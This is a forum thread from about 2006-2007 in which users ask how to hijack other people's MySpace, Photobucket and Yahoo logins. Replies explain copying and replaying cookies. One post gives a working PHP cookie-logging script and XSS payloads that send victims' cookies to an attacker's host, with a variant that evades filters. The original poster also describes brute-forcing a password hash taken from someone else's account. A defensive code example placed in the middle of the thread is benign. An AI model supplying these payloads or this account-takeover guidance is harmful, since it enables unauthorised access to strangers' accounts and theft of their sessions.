
Thread: Cookie stealing

  1. #1
    Join Date
    Dec 2006
    Posts
    19

    Cookie stealing

    Let's say that someone is logged into an authenticated session such as myspace.com on their computer. If I were to copy all the myspace cookies and copy them on my computer, would I be logged in on their profile? I tried this for Firefox and I don't think it worked. How about IE 6 or 7?

    I also think I might have some old cookies from the account I want to get into; they are in the IE cookie folder. Can I work with these?
    Last edited by whizzlechiz; 12-21-2006 at 12:11 AM.

  2. #2
    Join Date
    Sep 2006
    Posts
    1,651
    I don't know about IE 6 or 7, I've tried replacing cookies, and it doesn't work. You have to use an outside program.

  3. #3
    Join Date
    Sep 2005
    Posts
    2,053
    Quote Originally Posted by whizzlechiz
    Let's say that someone is logged into an authenticated session such as myspace.com on their computer. If I were to copy all the myspace cookies and copy them on my computer, would I be logged in on their profile? I tried this for Firefox and I don't think it worked. How about IE 6 or 7?

    I also think I might have some old cookies from the account I want to get into; they are in the IE cookie folder. Can I work with these?
    I don't know why, but I don't think copying them into your cookies folder works. The cookies folder for IE is located here:

    C:\Documents and Settings\[USERNAME]\Cookies\

    However, once you have the cookie files it's easy to extract the data from them and enter into your browser manually with a tool like add n edit cookies. The IE cookie format is as follows:

    1. Cookie name
    2. Cookie value
    3. Host/path for the web server setting the cookie
    4. Flags
    5. Expiration time
    6. Expiration time
    7. Creation time
    8. Creation time
    9. Record delimiter (*)

    ...so any intelligent person can find the data and input it into their browser. Expiration dates can be changed to some time in the future.

    Firefox cookies are held in a profile file at this location:

    C:\Documents and Settings\[Username]\Application Data\Mozilla\Firefox\Profiles\

    ...so it is a lot harder to find the cookie data than when dealing with simple text files. That's why it's always advisable to use in-browser methods to extract cookie data rather than copying it directly from where it's stored. In that form, it is not designed for readability. One way to find the cookie of a certain site is to go to its website and enter in the address bar:

    javascript:alert(document.cookie);

    Or if it is too big for the alert box:

    javascript:document.cookie;

    This will display all the cookie data for the domain you are on - if it still exists on your PC, it will appear.

    As for doing this in IE 6 or 7, just use Firefox and the extension. All self-respecting hackers/programmers use Firefox or Opera anyway.
    Last edited by Ezekiel; 12-21-2006 at 01:30 PM.

  4. #4
    Join Date
    Dec 2006
    Posts
    19
    thanks for the info

  5. #5
    Join Date
    Sep 2006
    Posts
    1,651
    Cookies are not really a vulnerability. Everyone who makes logins and such should know that cookies can be used by someone else to gain access to whatever the login gives access to.

    The cookie should come into the hands of the person if:

    a) The cookie file is given by the victim to the person, or the person has access to their computer w/ the cookie file

    b) The victim clicks a link that takes them to an XSS-injection-vulnerable page, which will redirect them to the person's own page, which will log their cookie from the previous site.

    EDIT: The person who posted before me must have deleted their post or something, this post was a response.

  6. #6
    Join Date
    Jun 2006
    Posts
    459
    http://www.ssgroup.org/forum/index.php?showtopic=2*7
    7h* L**7*57 c4n7 h4ck m*!
    Proud to have quit playing ȧ

    If you write like a semi-literate boob you will very likely be ignored.
    Writing like a l**t script kiddie hax0r is the absolute l**t*st way to write!
    L0L

  7. #7
    Join Date
    Sep 2005
    Posts
    2,053
    Quote Originally Posted by ~~smart~fool~~
    http://www.ssgroup.org/forum/index.php?showtopic=2*7
    That forum requires membership.

    If there's any relevant discussion in that topic, feel free to repost it here so people don't have to register.

  8. #8
    Join Date
    Jun 2006
    Posts
    459
    Quote Originally Posted by mike*0*
    That forum requires membership.

    If there's any relevant discussion in that topic, feel free to repost it here so people don't have to register.
    Sorry my bad.

    Cookiestealing is a two-part process. You need to have a script to accept the cookie, and
    you need to have a way of sending the cookie to your script. Writing the script to accept
    the cookie is the easy part, whereas finding a way to send it to your script is the hard
    part. I'll show you an example of a PHP script that accepts cookies:

    CODE
    <?php
    $cookie = $_GET['cookie'];
    $log = fopen("log.txt", "a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>


    And there you have it, a simple cookiestealer. The way this script works is that it accepts
    the cookie when it is passed as a variable, in this case 'cookie' in the URL, and then
    saves it to a file called 'log.txt'. For example:

    CODE
    http://yoursite.com/steal.php?cookie=


    steal.php is the filename of the script we just wrote, ? lets the script know that we are
    going to pass some variables to it, and after that we can set cookie equal to whatever
    we want, but what we want to do is set cookie equal to the cookie from the site. This
    is the second and harder part of the cookiestealer.

    Most websites apply some sort of filter to input, so that you can't directly insert your
    own code. XSS deals with finding exploits within filters, allowing you to put your own
    code into a website. This might sound difficult, and in most cases it's not easy, but
    it can be very simple.

    Any website that allows you to post text potentially allows you to insert your own code
    into the website. Some examples of these types of sites are forums, guestbooks, any site
    with a "member profile", etc. And any of these sites that have users who log in also
    probably use cookies. Now you know what sort of sites might be vulnerable to
    cookiestealing.

    Let's assume that we have a website that someone made. This website has user login
    capability as well as a guestbook. And let's also assume that this website doesn't have
    any kind of filtering on what can be put into the guestbook. This means that you can
    put HTML and JavaScript directly into your post in the guestbook. I'll give you an
    example of some code that we could put into a guestbook post that would send the user's
    cookie to our script:

    CODE
    <script>
    document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;
    </script>


    Now whenever someone views the page that you posted this on, they will be redirected to
    your script with their cookie from this site in the URL. If you were to look at log.txt
    now, you'd see the cookies of whoever looked at that page.

    But cookiestealing is never that easy. Let's assume now that the administrator of this
    site got smart, and decided to filter out script tags. Now your code doesn't work, so
    we have to try and evade the filter. In this instance, it's easy enough:

    CODE
    <a href="java script:void(document.location='http://yoursite.com/steal.php?cookie='+
    document.cookie)">Click Me</a>


    In this case, when the user clicks on the link they will be sent to your stealer with their
    cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get
    around filters.
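The guestbook case described in the post above, seen from the site owner's side, as an added example that is not part of the original thread: encoding posts on output neutralises both the script-tag form and the link form, a filter that only strips script tags lets the link through, and a session cookie marked HttpOnly is not readable through document.cookie. The function names, the sample posts and the collector.invalid host are constructed for illustration.

```javascript
// Added defensive example; all function names here are hypothetical.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode on output: every HTML metacharacter becomes an entity, so the
// browser displays a post as text instead of parsing it as markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// The kind of blacklist filter the post describes: it removes <script>
// elements only, so markup carried by other tags or attributes survives.
function stripScriptTags(html) {
  return String(html).replace(/<script\b[\s\S]*?<\/script\s*>/gi, '');
}

// Session cookie header. HttpOnly hides the cookie from document.cookie,
// Secure keeps it off plain HTTP, SameSite limits cross-site sends.
function buildSessionCookie(name, value, maxAgeSeconds) {
  if (!/^[A-Za-z0-9_-]+$/.test(name)) throw new Error('invalid cookie name');
  return [
    `${name}=${encodeURIComponent(value)}`,
    'Path=/',
    `Max-Age=${maxAgeSeconds}`,
    'HttpOnly',
    'Secure',
    'SameSite=Lax',
  ].join('; ');
}

// Constructed sample posts, modelled on the two shapes in the post above.
const SAMPLE_POSTS = [
  '<script>document.location="http://collector.invalid/?c="+document.cookie</script>',
  '<a href="javascript:void(0)">Click Me</a>',
];

// True when the output still contains a tag the browser would parse.
function containsLiveMarkup(html) {
  return /<\s*[a-z!\/]/i.test(html);
}

function compareDefences() {
  return SAMPLE_POSTS.map((post) => ({
    blacklistLeavesMarkup: containsLiveMarkup(stripScriptTags(post)),
    encodedLeavesMarkup: containsLiveMarkup(escapeHtml(post)),
  }));
}
```
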

  9. #9
    Join Date
    Dec 2006
    Posts
    19
    Ok, I have a bunch of cookie files for various sites. I am viewing them with "Cookie Editor"; there is a lot of information. Shouldn't I just be able to edit the expiration dates and go to the site and have access?

    I guess that's in a perfect world.

    I am at least trying to get a logon name to show up in IE so I can see if I'm on the right *****(these are IE cookies, blah) but I can't figure this crap out. I've copied the cookies to my IE cookie folder and tried editing them with the program from there but nothing is working. Any suggestions? I also have add n edit cookies for Firefox. I imported the IE cookies into Firefox, and the ones I am editing all have a future expiration date but nothing works :\

    I also have C&B and I found a PW hash in one of the cookies and I'm brute forcing it (got the md5 hash through c&b) I have an idea of some of the letters and general length, so it only will take like *0 hrs but I have no idea if it'll work or not.

    I am working with myspace and photobucket cookies. Is anyone familiar with any of these? I see 2 hashes that could potentially be the PW hash (in the myspace cookie, using the cookie editor program, or is that not possible); the cookie names are IID and DERDB.

    I also have yahoo cookies
    Last edited by whizzlechiz; 01-28-2007 at 03:55 AM.

  10. #10
    Join Date
    Jun 2006
    Posts
    459
    Login name is most likely encoded with their own formula. Most of those cookies aren't as nooby as some of these vBulletin sites. It may not be possible to tamper with MySpace cookies (not that you would want to)

  11. #11
    Join Date
    Dec 2006
    Posts
    19
    Quote Originally Posted by ~~smart~fool~~
    not that you would want to)
    oh, of course not :P. I'm trying to get a PW is all
    Last edited by whizzlechiz; 01-31-2007 at 07:24 PM.

  12. #12
    Join Date
    Jan 2007
    Posts
    18

    hey

    Does anyone know how to get someone else's myspace cookies without them clicking on anything? I know it's possible because my friend showed it to me but he didn't tell me how to do it.

  13. #13
    Join Date
    Oct 2006
    Posts
    3
    I need some help!
    Who can help me with the message part for Yahoo?
    Can anyone tell me a new mode to take the Yahoo cookie?
